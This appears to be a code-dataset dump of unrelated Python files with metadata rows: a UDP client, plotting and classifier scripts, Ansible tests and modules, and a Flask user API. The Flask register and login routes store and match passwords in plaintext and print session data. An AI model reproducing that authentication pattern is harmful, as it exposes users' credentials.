'size':(85, 25),
'label':'Prev',
},
{'type':'Button',
'name':'nextButton',
'position':(510, 155),
'size':(85, 25),
'label':'Next',
},
{'type':'Button',
'name':'exitButton',
'position':(510, 180),
'size':(85, 25),
'label':'Exit',
},
{'type':'MultiColumnList',
'name':'theList',
'position':(3, 3), #10, 305
'size':(500, 390),
'columnHeadings': ['Example List'],
'items':['Example 1','Example 2','Example 3'],
},
{'type':'TextArea',
'name':'displayArea',
'position':(3, 398),
'size':(500, 40),
'font':{'family': 'monospace', 'size': 12},
},
{'type':'TextArea',
'name':'countArea',
'position':(507, 398),
'size':(85, 40),
'font':{'family': 'monospace', 'size': 12},
},
]
}
]
}
}
| 19.504425 | 57 | 0.4451 | 193 | 2,204 | 5.082902 | 0.414508 | 0.055046 | 0.114169 | 0.106014 | 0.089704 | 0.055046 | 0 | 0 | 0 | 0 | 0 | 0.078483 | 0.306261 | 2,204 | 112 | 58 | 19.678571 | 0.563113 | 0.003176 | 0 | 0.206186 | 0 | 0 | 0.400638 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e55b79a5473e9aecdfba3270696b5d5cc02b816 | 629 | py | Python | udp-client.py | fionahiklas/udp-broadcast-examples | c5a2ccee8cd567eed688dd5bb0838f6db937ffcc | [
"MIT"
] | null | null | null | udp-client.py | fionahiklas/udp-broadcast-examples | c5a2ccee8cd567eed688dd5bb0838f6db937ffcc | [
"MIT"
] | null | null | null | udp-client.py | fionahiklas/udp-broadcast-examples | c5a2ccee8cd567eed688dd5bb0838f6db937ffcc | [
"MIT"
] | null | null | null | import socket, traceback
host = '255.255.255.255' # Bind to all interfaces
port = 2081
print "Creating socker on port: ", port
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#print "Setting REUSEADDR option"
#s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print "Setting SO_BROADCAST option"
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
print "Connecting to host: ", host
s.connect((host, port))
try:
print "Going to send data ..."
s.send("I am here")
print "... sent"
except (KeyboardInterrupt, SystemExit):
raise
except:
traceback.print_exc()
| 22.464286 | 79 | 0.685215 | 86 | 629 | 4.918605 | 0.5 | 0.113475 | 0.042553 | 0.108747 | 0.189125 | 0.189125 | 0.189125 | 0.189125 | 0 | 0 | 0 | 0.035644 | 0.197138 | 629 | 27 | 80 | 23.296296 | 0.80198 | 0.173291 | 0 | 0 | 0 | 0 | 0.245136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.058824 | null | null | 0.352941 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e644cef7cba4c85e3f86b90cf0dc4c1d1385fb4 | 1,196 | py | Python | boxplots.py | wrightaprilm/plaus | ace7e008fc76f83d75e2219a2cb9ed2ddf776775 | [
"MIT"
] | null | null | null | boxplots.py | wrightaprilm/plaus | ace7e008fc76f83d75e2219a2cb9ed2ddf776775 | [
"MIT"
] | null | null | null | boxplots.py | wrightaprilm/plaus | ace7e008fc76f83d75e2219a2cb9ed2ddf776775 | [
"MIT"
] | null | null | null | import pandas as pd
import os
import re
import dendropy
from dendropy.utility.fileutils import find_files
import matplotlib.pyplot as plt
plt.style.use('ggplot')
default = pd.read_csv('./d.csv')
uniform = pd.read_csv('./1.csv')
exp = pd.read_csv('./e.csv')
fixed = pd.read_csv('./2.csv')
uniform.columns = ['a','uni', 'b','c','d']
default.columns = ['a','def', 'b','c','d']
exp.columns = ['a','exp', 'b','c','d']
fixed.columns = ['a','fix', 'b','c','d']
uniform = uniform.drop(['b','c','d'],axis=1)
fixed =fixed.drop(['b','c','d'],axis=1)
exp =exp.drop(['b','c','d'],axis=1)
default =default.drop(['b','c','d'],axis=1)
merged_inner = pd.merge(left=default, right=exp, left_on='a', right_on = 'a')
merged_inner = pd.merge(left=merged_inner, right=fixed,left_on='a', right_on = 'a')
merged_inner = pd.merge(left=merged_inner, right=uniform, left_on='a', right_on = 'a')
merged_inner['default'] = merged_inner['def']/10
merged_inner['expo'] = merged_inner['exp']/10
merged_inner['fixed'] = merged_inner['fix']/10
merged_inner['uniform'] = merged_inner['uni']/10
merged_inner = merged_inner.drop(['def','exp','fix','uni','a'],axis=1)
merged_inner.plot(kind='box').set_ylim(-.2,1)
plt.show()
| 30.666667 | 86 | 0.658863 | 205 | 1,196 | 3.707317 | 0.24878 | 0.231579 | 0.031579 | 0.036842 | 0.265789 | 0.236842 | 0.173684 | 0.173684 | 0.139474 | 0.139474 | 0 | 0.015582 | 0.087793 | 1,196 | 38 | 87 | 31.473684 | 0.681027 | 0 | 0 | 0 | 0 | 0 | 0.109532 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.206897 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e66c677ddf91468564650a9956d8af23cde2f1e | 347 | py | Python | back-end/src/handler/util/user_util_test.py | gfxcc/san11-platform-back-end | 74f60d201e21396c5c8601ddc404077ebd97871f | [
"MIT"
] | 1 | 2022-03-13T04:24:00.000Z | 2022-03-13T04:24:00.000Z | back-end/src/handler/util/user_util_test.py | gfxcc/san11-platform-back-end | 74f60d201e21396c5c8601ddc404077ebd97871f | [
"MIT"
] | null | null | null | back-end/src/handler/util/user_util_test.py | gfxcc/san11-platform-back-end | 74f60d201e21396c5c8601ddc404077ebd97871f | [
"MIT"
] | null | null | null | import unittest
import uuid
from . import user_util
class TestUtilFuncs(unittest.TestCase):
def test_hash_and_verify_password(self):
passwords = [str(uuid.uuid4()) for i in range(10)]
for pw in passwords:
self.assertTrue(
user_util.verify_password(pw, user_util.hash_password(pw))
)
| 23.133333 | 74 | 0.654179 | 44 | 347 | 4.954545 | 0.590909 | 0.110092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011719 | 0.262248 | 347 | 14 | 75 | 24.785714 | 0.839844 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.1 | false | 0.4 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1e678c3dc5352fc822740f8558e00375177acaa0 | 1,284 | py | Python | ex042.py | ArthurCorrea/python-exercises | 0c2ac46b8c40dd9868b132e847cfa42e025095e3 | [
"MIT"
] | null | null | null | ex042.py | ArthurCorrea/python-exercises | 0c2ac46b8c40dd9868b132e847cfa42e025095e3 | [
"MIT"
] | null | null | null | ex042.py | ArthurCorrea/python-exercises | 0c2ac46b8c40dd9868b132e847cfa42e025095e3 | [
"MIT"
] | null | null | null | # Refaça o desafio 035, acrescentando o recurso de mostrar que
# tipo de triângulo será formado:
# - Equilátero: todos os lados iguais;
# - Isósceles: dois lados iguais;
# - Escaleno: todos os lados diferentes.
n1 = float(input('\033[34mMedida 1:\033[m '))
n2 = float(input('\033[31mMedida 2:\033[m '))
n3 = float(input('\033[36mMedida 3:\033[m '))
if n1 < n2 + n3 and n2 < n1 + n3 and n3 < n1 + n2:
print('\033[30mCom essas medidas É POSSÍVEL montarmos um triângulo!\033[m')
if n1 == n2 and n2 == n3:
print('Esse triângulo será EQUILÁTERO.')
elif n1 == n2 or n1 == n3:
print('Esse triângulo será ISÓSCELES.')
elif n1 != n2 and n2 != n3:
print('Esse triângulo será ESCALENO.')
else:
print('\033[30mCom essas medidas NÃO É POSSÍVEL montarmos um triângulo!\033[m')
# Forma mais complexa e desnecessária que acabei fazendo
''' if n1 == n2 and n2 == n3 and n1 < n2 + n3 and n2 < n1 + n3 and n3 < n1 + n2:
print('\033[35mEsse triângulo será EQUILÁTERO!\033[m')
elif n1 == n2 or n1 == n3 and n1 < n2 + n3 and n2 < n1 + n3 and n3 < n1 + n2:
print('\033[35mEsse triângulo será ISÓSCELES!\033[m')
elif n1 != n2 and n2 != n3 and n1 < n2 + n3 and n2 < n1 + n3 and n3 < n1 + n2:
print('\033[35mEsse triângulo será ESCALENO!\033[m') '''
| 42.8 | 83 | 0.641745 | 210 | 1,284 | 3.92381 | 0.27619 | 0.067961 | 0.050971 | 0.043689 | 0.571602 | 0.474515 | 0.428398 | 0.348301 | 0.348301 | 0.268204 | 0 | 0.133133 | 0.221963 | 1,284 | 29 | 84 | 44.275862 | 0.691692 | 0.198598 | 0 | 0 | 0 | 0 | 0.492562 | 0 | 0 | 0 | 0 | 0.034483 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.384615 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e6f53f22427895238f581e8e9e288f9b5fd6b34 | 1,400 | py | Python | make_standalone_html.py | peli-pro/coldcard_address_generator | a4c3b53145a8886d4803932504b5f0b493b5c89d | [
"MIT"
] | 1 | 2019-11-20T09:23:52.000Z | 2019-11-20T09:23:52.000Z | make_standalone_html.py | peli-pro/coldcard_address_generator | a4c3b53145a8886d4803932504b5f0b493b5c89d | [
"MIT"
] | null | null | null | make_standalone_html.py | peli-pro/coldcard_address_generator | a4c3b53145a8886d4803932504b5f0b493b5c89d | [
"MIT"
] | 2 | 2019-11-20T09:23:55.000Z | 2021-06-03T23:48:41.000Z | from pathlib import Path
'''
This script creates a new html that has placed the javascript code inline to make a standalone html
'''
src = Path.cwd() / 'coldcard_address_generator_html.html'
dest = Path.cwd() / 'coldcard_address_generator_html_standalone.html'
dest2 = Path.cwd() / 'index.html' # for github pages
string = '<script src="js/coldcard_address_generator_html.js"></script>'
def main():
with open(src) as s:
source = s.readlines()
source = replace(source, '<script src="js/coldcard_address_generator_html.js"></script>', Path.cwd() / 'js' / 'coldcard_address_generator_html.js')
source = replace(source, '<script type="module" src="js/bip32.js"></script>', Path.cwd() / 'js' / 'bip32.js')
source = replace(source, '<script type="module" src="js/bitcoinjs-lib.js"></script>', Path.cwd() / 'js' / 'bitcoinjs-lib.js')
with open(dest, 'w') as d:
for line in source:
d.write(line)
with open(dest2, 'w') as d:
for line in source:
d.write(line)
def replace(string_arr, find_str, replacement_file):
out = []
with open(replacement_file) as r:
rep = r.read()
for line in string_arr:
if find_str in line:
out.append('<script>' + rep + '</script>\n')
print()
else:
out.append(line)
return out
if __name__ == '__main__':
main()
| 25.925926 | 151 | 0.624286 | 192 | 1,400 | 4.395833 | 0.354167 | 0.049763 | 0.14218 | 0.165877 | 0.446682 | 0.398104 | 0.279621 | 0.279621 | 0.279621 | 0.06872 | 0 | 0.005545 | 0.227143 | 1,400 | 53 | 152 | 26.415094 | 0.774492 | 0.011429 | 0 | 0.133333 | 0 | 0 | 0.324706 | 0.223529 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.033333 | 0 | 0.133333 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e7134f2c2c9991f667c83bc9558dfc8470c2fc4 | 6,401 | py | Python | movieClass.py | qedseung/Movie-Classifier | a20615f9c910d123f8772dbcc922eee16a9b6958 | [
"MIT"
] | null | null | null | movieClass.py | qedseung/Movie-Classifier | a20615f9c910d123f8772dbcc922eee16a9b6958 | [
"MIT"
] | null | null | null | movieClass.py | qedseung/Movie-Classifier | a20615f9c910d123f8772dbcc922eee16a9b6958 | [
"MIT"
] | null | null | null | import sys, numpy
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import MultinomialNB
#0=drama,1=comedy,2=animated,3=action/adventure
def random_forest_class(raw_test_set):
x_train=[]
y_train=[]
count=0
vectorizer = TfidfVectorizer(analyzer='word', stop_words='english', max_features = 1024)
with open("movieTraining2.txt", "r") as mtf:
for line in mtf:
temp = line.split("||")
x_train.append(temp[4])
y_train.append(temp[0])
count+=1
'''
if count==5:
raw_test_set.append(temp[3])
elif count==127:
raw_test_set.append(temp[3])
print(temp[1])
elif count==157:
raw_test_set.append(temp[3])
print(temp[1])
elif count==394:
raw_test_set.append(temp[3])
'''
train_data_feat = vectorizer.fit_transform(x_train).toarray()
randoforest = RandomForestClassifier(n_estimators = 100)
randoforest = randoforest.fit(train_data_feat, y_train)
test_data_feat = vectorizer.transform(raw_test_set).toarray()
result = randoforest.predict(test_data_feat)
return result
#print(len(y_train),len(raw_test_set))
#print(x_train[220])
def naive_bayes_class(raw_test_set):
x_train=[]
y_train=[]
count=0
vectorizer = TfidfVectorizer(analyzer='word', stop_words='english', max_features = 1024)
with open("movieTraining2.txt", "r") as mtf:
for line in mtf:
temp = line.split("||")
x_train.append(temp[4])
y_train.append(temp[1])
count+=1
'''
if count==5:
raw_test_set.append(temp[3])
elif count==127:
raw_test_set.append(temp[3])
print(temp[1])
elif count==157:
raw_test_set.append(temp[3])
print(temp[1])
elif count==394:
raw_test_set.append(temp[3])
'''
train_data_feat = vectorizer.fit_transform(x_train).toarray()
nb = MultinomialNB()
nb = nb.fit(train_data_feat, y_train)
test_data_feat = vectorizer.transform(raw_test_set).toarray()
result = nb.predict(test_data_feat)
return result
def int2class(lizt, bol):
if bol:
for i in lizt:
if int(i)==0:
print('drama')
elif int(i)==1:
print('comedy')
elif int(i)==2:
print('animated')
elif int(i)==3:
print('action')
elif int(i)==4:
print('horror')
else:
for i in lizt:
print(i)
rts=[
"When Dipper and Mabel Pines get sent to their great-uncle Stan's shop in Gravity Falls, Oregon for the summer, they think it will be boring. But when Dipper find a strange journal in the woods, they learn about some strange secrets about the town. Welcome to Gravity Falls. Just north of Normal, west of Weird.",
"When chemistry teacher Walter White is diagnosed with Stage III cancer and given only two years to live, he decides he has nothing to lose. He lives with his teenage son, who has cerebral palsy, and his wife, in New Mexico. Determined to ensure that his family will have a secure future, Walt embarks on a career of drugs and crime. He proves to be remarkably proficient in this new world as he begins manufacturing and selling methamphetamine with one of his former students. The series tracks the impacts of a fatal diagnosis on a regular, hard working man, and explores how a fatal diagnosis affects his morality and transforms him into a major player of the drug trade.",
"A 19th century Western. Chon Wang is a clumsy Imperial Guard to the Emperor of China. When Princess Pei Pei is kidnapped from the Forbidden City, Wang feels personally responsible and insists on joining the guards sent to rescue the Princess, who has been whisked away to the United States. In Nevada and hot on the trail of the kidnappers, Wang is separated from the group and soon finds himself an unlikely partner with Roy O'Bannon, a small time robber with delusions of grandeur. Together, the two forge onto one misadventure after another.",
"A former lawyer attends a community college when it is discovered he faked his bachelor degree. In an attempt to get with a student in his Spanish class he forms a Spanish study group. To his surprise more people attend the study group and the group of misfits form an unlikely community.",
"A Michigan farmer and a prospector form a partnership in the California gold country. Their adventures include buying and sharing a wife, hijacking a stage, kidnaping six prostitutes, and turning their mining camp into a boomtown. Along the way there is plenty of drinking, gambling, and singing. They even find time to do some creative gold mining.",
"Dory is a wide-eyed, blue tang fish who suffers from memory loss every 10 seconds or so. The one thing she can remember is that she somehow became separated from her parents as a child. With help from her friends Nemo and Marlin, Dory embarks on an epic adventure to find them. Her journey brings her to the Marine Life Institute, a conservatory that houses diverse ocean species.",
"A US research station, Antarctica, early-winter 1982. The base is suddenly buzzed by a helicopter from the nearby Norwegian research station. They are trying to kill a dog that has escaped from their base. After the destruction of the Norwegian chopper the members of the US team fly to the Norwegian base, only to discover them all dead or missing. They do find the remains of a strange creature the Norwegians burned. The Americans take it to their base and deduce that it is an alien life form. After a while it is apparent that the alien can take over and assimilate into other life forms, including humans, and can spread like a virus.",
"This is a shit movie"
]
#res = naive_bayes_class(rts)
#res = random_forest_class(rts)
#x = []
#print("Please Describe a Story:")
#x.append(input().strip())
res = naive_bayes_class(rts)
int2class(res,True)
res = random_forest_class(rts)
int2class(res,False)
| 57.151786 | 680 | 0.678332 | 951 | 6,401 | 4.484753 | 0.42061 | 0.021336 | 0.030481 | 0.030012 | 0.254631 | 0.233998 | 0.219461 | 0.219461 | 0.219461 | 0.219461 | 0 | 0.01582 | 0.249492 | 6,401 | 112 | 681 | 57.151786 | 0.871982 | 0.035151 | 0 | 0.382353 | 0 | 0.102941 | 0.608335 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044118 | false | 0 | 0.058824 | 0 | 0.132353 | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e7349005521f955a834174f1d5dba20a6e96f33 | 5,335 | py | Python | api/views/view_users.py | AlanZhl/NodUleS | 868792d7af91b6b2d42cf065653c1ea1160922c1 | [
"MIT"
] | null | null | null | api/views/view_users.py | AlanZhl/NodUleS | 868792d7af91b6b2d42cf065653c1ea1160922c1 | [
"MIT"
] | null | null | null | api/views/view_users.py | AlanZhl/NodUleS | 868792d7af91b6b2d42cf065653c1ea1160922c1 | [
"MIT"
] | null | null | null | from flask import Blueprint, jsonify, request, session
from pymongo import DESCENDING
from api.views import users
from api import collection_users
@users.route("/api/register", methods=["POST"])
def user_register():
if request.method == "POST":
data = request.get_json()
email = data['email']
password = data['password']
confirm = data['confirm']
user_name = data["user_name"]
if not all([email, password, confirm]):
return jsonify("Sorry, all the input fields are required.")
if password != confirm:
return jsonify("Inconsistent passwords.")
try:
existent_user = collection_users.find_one({"email": email}, projection={"password": False})
if existent_user != None:
return jsonify("User exists with this email. Please try a new one.")
# default role: student (user_id >= 3001)
max_id = 3000
for user in collection_users.find(filter={}, sort=[("user_id", DESCENDING)], limit=1, projection={"user_id": True}):
if user["user_id"] > max_id:
max_id = user["user_id"]
new_user = {
"user_id": max_id + 1, "user_name": user_name, 'email': email,
'password': password, "role": 0,
"enrolled_courses": ["IT5007", "IT5002"],
"favored_courses": [],
"taken_courses": ["IT5001", "IT5003"],
"about_me": "",
}
collection_users.insert_one(new_user)
return jsonify("Registeration Succeeds!")
except Exception as e:
print(e)
return jsonify("Registration failed due to server error.")
@users.route("/api/login", methods=["GET", "POST"])
def user_login():
if request.method == "POST":
data = request.get_json()
email = data['email']
remember = data['remember']
password = str(data['password'])
if not email or not password:
return jsonify({"status": 0, "message": "Invalid input."})
# ip = request.remote_addr //for trying limit
check_comb = {"email": email, "password": password}
try:
user = collection_users.find_one(check_comb, projection={"user_id": True, "user_name": True})
print('Succeed: login matched.')
session[email] = True
session.permanent = True
session["user_id"] = user["user_id"]
session["user_name"] = user["user_name"]
return jsonify({"status": 1, "message": 'Log in Successfuuly!'})
except Exception as e:
print(e)
print("Login Error: Fail to find user with given email and password")
return jsonify({"status": 0, "message": "Mismatch on email or password."})
@users.route("/api/users/info", methods=["POST"])
def get_userinfo():
user_id = session.get("user_id")
if user_id == None:
print(f"getUserInfo Error: Probably no user has logined.")
return jsonify({"user_id": -1})
try:
user = collection_users.find_one({"user_id": user_id}, projection={"_id": False, "password": False})
print(f"Succeed: user {user_id} found." if user != None else f"Failed: cannot find user {user_id}!")
return jsonify(user) if user != None else jsonify({"user_id": -1})
except Exception as e:
print(e)
print(f"getUserInfor Error: user with id {user_id} is not found.")
return jsonify({"user_id": -1})
@users.route('/api/logout', methods=["POST"])
def logout():
if request.method == 'POST':
print("session to be deleted: ", session) # for tests only
if session == None:
print("Logout Error: no session currently.")
return jsonify({"status": 0})
user_name = session.get("user_name")
session.clear()
print(f"Succeed: {user_name} log out successfully. Remaining session info: ", session) # for tests only
return jsonify({"status": 1, "user_name": user_name})
@users.route("/api/users/set_favor", methods=["POST"])
def set_favoredCourse():
data = request.get_json()
user_id = data["user_id"]
course_id = data["course_id"]
status = data["status"]
try:
favored_courses = collection_users.find_one({"user_id": user_id}, projection={"favored_courses": True})["favored_courses"]
if status == 0 and course_id in favored_courses:
favored_courses.remove(course_id)
collection_users.update_one({"user_id": user_id}, {"$set": {"favored_courses": favored_courses}})
elif status == 1 and course_id not in favored_courses:
favored_courses.append(course_id)
collection_users.update_one({"user_id": user_id}, {"$set": {"favored_courses": favored_courses}})
else:
print("Backend record of favored courses mismatches with the frontend!")
return jsonify({"status": -1})
return jsonify({"status": 1})
except Exception as e:
print(e)
return jsonify({"status": -1}) | 42.34127 | 131 | 0.574133 | 614 | 5,335 | 4.830619 | 0.2443 | 0.056642 | 0.051247 | 0.033715 | 0.259609 | 0.19555 | 0.159811 | 0.139582 | 0.114633 | 0.084963 | 0 | 0.010627 | 0.29447 | 5,335 | 126 | 132 | 42.34127 | 0.777365 | 0.021181 | 0 | 0.238095 | 0 | 0 | 0.253289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.114286 | 0.038095 | 0 | 0.238095 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1e73c2add48c20fe5c43b5ce0c4067b41b3c86c2 | 2,131 | py | Python | ansible-devel/test/units/utils/test_display.py | satishcarya/ansible | ed091e174c26316f621ac16344a95c99f56bdc43 | [
"MIT"
] | null | null | null | ansible-devel/test/units/utils/test_display.py | satishcarya/ansible | ed091e174c26316f621ac16344a95c99f56bdc43 | [
"MIT"
] | null | null | null | ansible-devel/test/units/utils/test_display.py | satishcarya/ansible | ed091e174c26316f621ac16344a95c99f56bdc43 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# (c) 2020 Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from units.compat.mock import MagicMock
import pytest
from ansible.module_utils.six import PY3
from ansible.utils.display import Display, get_text_width, initialize_locale
def test_get_text_width():
initialize_locale()
assert get_text_width(u'コンニチハ') == 10
assert get_text_width(u'abコcd') == 6
assert get_text_width(u'café') == 4
assert get_text_width(u'four') == 4
assert get_text_width(u'\u001B') == 0
assert get_text_width(u'ab\u0000') == 2
assert get_text_width(u'abコ\u0000') == 4
assert get_text_width(u'🚀🐮') == 4
assert get_text_width(u'\x08') == 0
assert get_text_width(u'\x08\x08') == 0
assert get_text_width(u'ab\x08cd') == 3
assert get_text_width(u'ab\x1bcd') == 3
assert get_text_width(u'ab\x7fcd') == 3
assert get_text_width(u'ab\x94cd') == 3
pytest.raises(TypeError, get_text_width, 1)
pytest.raises(TypeError, get_text_width, b'four')
@pytest.mark.skipif(PY3, reason='Fallback only happens reliably on py2')
def test_get_text_width_no_locale():
pytest.raises(EnvironmentError, get_text_width, u'🚀🐮')
def test_Display_banner_get_text_width(monkeypatch):
initialize_locale()
display = Display()
display_mock = MagicMock()
monkeypatch.setattr(display, 'display', display_mock)
display.banner(u'🚀🐮', color=False, cows=False)
args, kwargs = display_mock.call_args
msg = args[0]
stars = u' %s' % (75 * u'*')
assert msg.endswith(stars)
@pytest.mark.skipif(PY3, reason='Fallback only happens reliably on py2')
def test_Display_banner_get_text_width_fallback(monkeypatch):
display = Display()
display_mock = MagicMock()
monkeypatch.setattr(display, 'display', display_mock)
display.banner(u'🚀🐮', color=False, cows=False)
args, kwargs = display_mock.call_args
msg = args[0]
stars = u' %s' % (77 * u'*')
assert msg.endswith(stars)
| 32.287879 | 92 | 0.704833 | 321 | 2,131 | 4.464174 | 0.317757 | 0.107467 | 0.184229 | 0.136078 | 0.695045 | 0.545708 | 0.441731 | 0.307048 | 0.307048 | 0.307048 | 0 | 0.03309 | 0.163304 | 2,131 | 65 | 93 | 32.784615 | 0.766125 | 0.06992 | 0 | 0.382979 | 0 | 0 | 0.097573 | 0 | 0 | 0 | 0 | 0 | 0.340426 | 1 | 0.085106 | false | 0 | 0.106383 | 0 | 0.191489 | 0.021277 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1e744d2a9768775a762dc0670443f52bc8289280 | 11,797 | py | Python | plugins/modules/oci_network_byoip_range_actions.py | A7rMtWE57x/oci-ansible-collection | 80548243a085cd53fd5dddaa8135b5cb43612c66 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_network_byoip_range_actions.py | A7rMtWE57x/oci-ansible-collection | 80548243a085cd53fd5dddaa8135b5cb43612c66 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_network_byoip_range_actions.py | A7rMtWE57x/oci-ansible-collection | 80548243a085cd53fd5dddaa8135b5cb43612c66 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2017, 2020 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_network_byoip_range_actions
short_description: Perform actions on a ByoipRange resource in Oracle Cloud Infrastructure
description:
- Perform actions on a ByoipRange resource in Oracle Cloud Infrastructure
- For I(action=advertise), initiate route advertisements for the Byoip Range prefix.
the prefix must be in PROVISIONED state
- For I(action=validate), submit the Byoip Range for validation. This presumes the user has
updated their IP registry record in accordance to validation requirements
- For I(action=withdraw), stop route advertisements for the Byoip Range prefix.
version_added: "2.9"
author: Oracle (@oracle)
options:
byoip_range_id:
description:
- The OCID of the Byoip Range object.
type: str
aliases: ["id"]
required: true
action:
description:
- The action to perform on the ByoipRange.
type: str
required: true
choices:
- "advertise"
- "validate"
- "withdraw"
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_wait_options ]
"""
EXAMPLES = """
- name: Perform action advertise on byoip_range
oci_network_byoip_range_actions:
byoip_range_id: ocid1.byoiprange.oc1..xxxxxxEXAMPLExxxxxx
action: advertise
- name: Perform action validate on byoip_range
oci_network_byoip_range_actions:
byoip_range_id: ocid1.byoiprange.oc1..xxxxxxEXAMPLExxxxxx
action: validate
- name: Perform action withdraw on byoip_range
oci_network_byoip_range_actions:
byoip_range_id: ocid1.byoiprange.oc1..xxxxxxEXAMPLExxxxxx
action: withdraw
"""
RETURN = """
byoip_range:
description:
- Details of the ByoipRange resource acted upon by the current operation
returned: on success
type: complex
contains:
cidr_block:
description:
- The address range the user is on-boarding.
returned: on success
type: string
sample: cidr_block_example
compartment_id:
description:
- The OCID of the compartment containing the Byoip Range.
returned: on success
type: string
sample: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx
defined_tags:
description:
- Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
display_name:
description:
- A user-friendly name. Does not have to be unique, and it's changeable. Avoid
entering confidential information.
returned: on success
type: string
sample: display_name_example
freeform_tags:
description:
- Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see L(Resource
Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
id:
description:
- The Oracle ID (OCID) of the Byoip Range.
returned: on success
type: string
sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx
lifecycle_details:
description:
- The Byoip Range's current substate.
returned: on success
type: string
sample: CREATING
lifecycle_state:
description:
- The Byoip Range's current state.
returned: on success
type: string
sample: INACTIVE
